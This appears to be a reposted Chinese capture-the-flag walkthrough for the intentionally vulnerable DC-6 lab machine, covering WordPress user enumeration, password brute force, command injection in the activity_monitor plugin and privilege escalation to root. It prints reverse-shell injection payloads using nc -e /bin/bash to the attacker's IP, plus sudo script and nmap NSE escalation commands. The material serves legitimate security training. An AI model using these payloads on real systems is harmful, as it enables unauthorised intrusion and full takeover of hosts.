2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权(转)
靶场下载链接:
Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)
0x01 环境搭建
直接使用VMware 或者 virtulbox 打开指定路径会自动导入,由于作者默认设置的是桥接模式,我们手动改为nat 模式即可。
0x02 主机发现
由于主机ip未知,首先我们应该考虑获得目标的ip地址,思路就是使用arp去发现内网存活主机,从而确定目标主机ip为192.168.88.184。
root@kali:~# netdiscover -i eth0 -r 192.168.88.1/24
0x03 端口探测
直接使用nmap进行端口探测,发现开放了两个端口22(ssh)、80(http)
Did not follow redirect to http://wordy/ 其中 web 服务被重定向到 http://wordy/
此时我们要么准备字典爆破ssh,要么通过web进行渗透。我们先来渗透web吧
0x04 访问web服务
由于web服务被重定向到http://wordy/ ,我们可以本地添加域名到主机文件,这样以后我们访问http://wordy/ 就相当于访问对应的ip地址。添加完域名及对应ip后,可以发现已经能够访问http://wordy/
访问 http://wordy/ ,可以看到是一个wordpress的网站。
0x05 漏洞扫描
使用wordpress漏洞测试工具wpscan进行网站漏洞探测,wpscan是一款针对wordpress的黑盒漏洞扫描器,可以获得包括版本、主体、插件等信息。
git clone https://github.com/wpscanteam/wpscan.git kali自带的wpscan数据库升级不了,所以我又重装了一个。
wpscan –url http://wordy –enumerate vp –enumerate vt –enumerate u
–enumerate u 枚举用户
–enumerate p 扫描安装的插件
–enumerate vp 扫描目标插件中的安全漏洞
–enumerate t 扫描主题
–enumerate vt 扫描主题中存在的漏洞
–enumerate tt 扫描文件漏洞
扫描结果
链接信息:
[+] http://wordy/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
[+] http://wordy/xmlrpc.php
[+] http://wordy/readme.html
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
[+] http://wordy/wp-cron.php
版本信息:
[+] WordPress version 5.1.1 identified (Latest, released on 2019-03-13).
| Detected By: Rss Generator (Passive Detection)
主题信息:
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
用户枚举:
[i] User(s) Identified:
[+] admin
[+] graham
[+] mark
[+] sarah
[+] jens
0x05 利用已知信息登录系统
生成用户字典和密码
cat rockyou.txt | grep k01 > k01.txt 生成密码字典
./wpscan –url http://wordy/ –passwords /usr/share/wordlists/k01.txt –usernames /root/wp.txt
我们获得了Username: mark, Password: helpdesk01
我们使用获得的密码登录http://wordy/wp-admin/
可以看到安装了activity_monitor插件。
ok,我们去搜索activity_monitor插件相关漏洞。
0x06 漏洞利用
查看描述,通过替换ip、端口可以反弹shell
替换为如下格式即可:
nc -lvvp 333 我们在本机监听333端口
并且开启一个简单的临时的web服务,去访问45274.html 来触发漏洞
python -m SimpleHTTPServer 8080
访问web服务,发送google.fr| nc 192.168.88.183 333 -e /bin/bash给目标
成功接收到目标反弹回来的shell
也可以访问http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools输入ip,点击lookup,通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 192.168.88.183 333
进⼀步执⾏如下指令获取完整的shell:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
通过⽬录查看,发现在/home/mark/stuff⽬录下存在thing-to-do.txt⽂件,其内容为:
可以看到偶一个用户名和密码: graham – GSo7isUM1D4,由于系统开启了ssh,我们可以尝试进行登录一下:
OK,登录成功了!
0x07 权限提升
我们使用graham成功登录了目标系统。
使用sudo -l 查看目前用户可以执行的操作,发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的。
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
我们可以将解压命令删除,替换成/bin/bash,以jens用户去执行该脚本
此时我们已经是jens用户了,我们继续执行sudo -l 命令去查找我们可以进行的操作。
NOPASSWD: /usr/bin/nmap,jens用户可以在无需输入密码的情况下使用nmap,我们继续使用nmap去调用我们的脚本例如/bin/bash.
echo “os.execute(‘/bin/bash’)” > /tmp/root.nse
sudo nmap –script=/tmp/root.nse
通过nmap运行该脚本我们成功进入root用户。
2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权(转)相关推荐
- Kali Linux 秘籍 第六章 漏洞利用
第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- 部分CIA的漏洞利用工具干货请查收
3月12日讯 CIA 辛辛苦苦几年攒的漏洞和工具"被"提交事件后,业内人士和记者都在仔细查看这些文件,各方都在关注事情进展. 相关阅读: 维基解密再曝美国情报机构惊天内幕 批露CI ...
- php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析
1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...
- Windows漏洞利用技术概述
Windows漏洞利用技术总结 1. 前言 本文是我对漏洞利用技术的学习总结,也是自己践行QAD (Questions.Answer.Discussions)的一次实践.本文通过阅读几位大牛的文章.演 ...
- Vulnhub 靶机 Stapler write up samba+wp advanced-video ->mysql 密码 连接 john解密 登录后台 wp插件getshell sudo提权
Stapler write up 0x00 靶机搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 mysql 思路 ftp 思路 139 samba思路 步骤一:ftp匿名访问 步骤二:sam ...
- 纯Go实现的Firebase的替代品 | Gopher Daily (2021.08.11) ʕ◔ϖ◔ʔ
每日一谚:Global variables should have longer names. Go技术生态 如何才能成功将Python切换到Go - https://itnext.io/opinio ...
- wordpress插件翻译不生效_新的恶意软件利用wordpress插件漏洞攻击数百万网站
研究人员发现,正在进行的一项针对数百万WordPress网站的恶意攻击活动,目的是利用后门和各种WordPress插件漏洞进行感染. 据wordpress统计,wordpress内容管理系统提供了近6 ...
- hdf5 目录没有serial_Serial靶机实战
原创Jarry 四叶草网络安全学院 今天研究一下php反序列化,靶机serial实战.目标为获取root权限. 靶机信息 可以去vulhub上下载此靶机,下载好,之后,使用Vmware新建虚拟机打开, ...
最新文章
- 重磅发布:Redis 对象映射框架来了,操作大大简化!
- 图神经网络在生物医药领域的12项研究综述
- jfinal 动态切换orm 映射
- 【转】Mutex使用方法(精辟)
- wave格式分析,wave音频文件格式分析配程序
- mybatis基本增删改查、缓存,延迟加载以及别名的配置
- 项目发布后 Tomcat中只有web-INF文件夹
- 《IBM-PC汇编语言程序设计》(第2版)【沈美明 温冬婵】——自编解析与答案
- mysql数据库自增字段_mysql 数据库自增字段
- 几个公共FTP服务器
- 2021年PMP考试模拟题7(含答案解析)
- 【Spark Mllib】决策树,随机森林——预测森林植被类型
- Linux 内核md5sum使用,linux命令详解:md5sum命令(示例代码)
- 蛋白工厂(rRNA)和物流系统(tRNA)的识别鉴定-Barrnap,Infernal和tRNA-scan-SE
- 批量修改文件名称方法
- pythonic希腊典故_希腊神话习语(整理).doc
- JAVA程序员工作常用英语
- html禁止双击选中文本,CSS阻止页面双击选中文本
- python天津儿童培训少儿编程课一定要了解
- MuleSoft知识总结-7.使用Anypoint Studio
热门文章
- Layui的eleTree树式选择器使用
- vim格式化html代码
- Apache2.4 HTTP服务器配置反向代理和负载均衡
- php 连接数据库有很多notice,PHP Notice: undefined index 完美解决方法
- java去掉首尾字符_去掉字符串首尾指定的字符或空格
- 运放选型、参数分析以及应用
- 数千个数据库、遍布全国的物理机,京东物流全量上云实录 | 卓越技术团队访谈录...
- 为什么有的公司会规定所有接口都用 POST请求?
- 用友畅捷通T+,现金流量相关档案从一个帐套复制到另个帐套
- c++ 堆优化版dijkstra 代码实现